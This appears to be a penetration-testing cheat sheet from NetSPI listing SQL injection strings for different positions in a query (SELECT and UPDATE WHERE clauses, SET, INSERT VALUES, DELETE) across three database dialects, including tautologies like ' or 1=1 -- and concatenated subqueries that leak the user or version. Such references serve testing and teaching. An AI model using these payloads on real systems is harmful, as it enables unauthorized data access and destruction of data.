Injection Placement

SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.

$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.

Injection placement Query Injection string
SELECT -> WHERE SELECT * FROM USERS WHERE USER='$injection'; ' or 1=1 --
UPDATE -> SET UPDATE USERS SET email='$injection' WHERE user='NetSPI'; ' 'harold@netspi.com' '
UPDATE -> WHERE
Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful.
UPDATE USERS SET email='harold@netspi.com' WHERE user='$injection'; ' 'netspi' '
DELETE -> WHERE
Note: Be very careful with delete queries, as the entire table can end up being deleted.
DELETE FROM USERS WHERE USERS='$injection'; ' 'harold@netspi.com' '

Injection Placement

SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.

$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.

Injection placement Query Injection string
SELECT -> WHERE SELECT user FROM dual WHERE user LIKE '$injection'; '||'USER%'||'
INSERT -> VALUES INSERT INTO log_table (message) VALUES ('$injection'); '||(select user from dual)||'
UPDATE -> SET UPDATE log_table SET message = '$injection' WHERE message = 'test'; '||(select user from dual)||
UPDATE -> WHERE
Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful.
UPDATE log_table SET message = 'test' WHERE message = '$injection'; '||'Injected'||'

Injection Placement

SQL injection is always a hassle when it isn't apparent where the injection is taking place. It is helpful to have a few ways to exploit injections in various parts of the query.

$injection identifies the injection point. The injections that modify data attempt to always use concatenation and allow the rest of the query to be valid. See this post for more information.

Injection placement Query Injection string
SELECT -> WHERE SELECT * FROM USERS WHERE "USER"='$injection'; ' or 1=1 --
UPDATE -> SET UPDATE USERS SET "email"='$injection' WHERE "USER"='NetSPI'; '+'harold@netspi.com'+'
UPDATE -> WHERE
Note: Try to set the injection string to a valid WHERE value. If the object is updated then the injection was successful.
UPDATE USERS SET "email"='harold@netspi.com' WHERE "USER"='$injection'; '+'NetSPI'+'
DELETE -> WHERE DELETE USERS WHERE "User"='$injection'; '+'NetSPI'+'
INSERT -> VALUES INSERT INTO USERS ([User], [Password]) VALUES ('$injection', 'password'); '+(select @@version)+'

© 2018 Copyright by NetSPI. All rights reserved.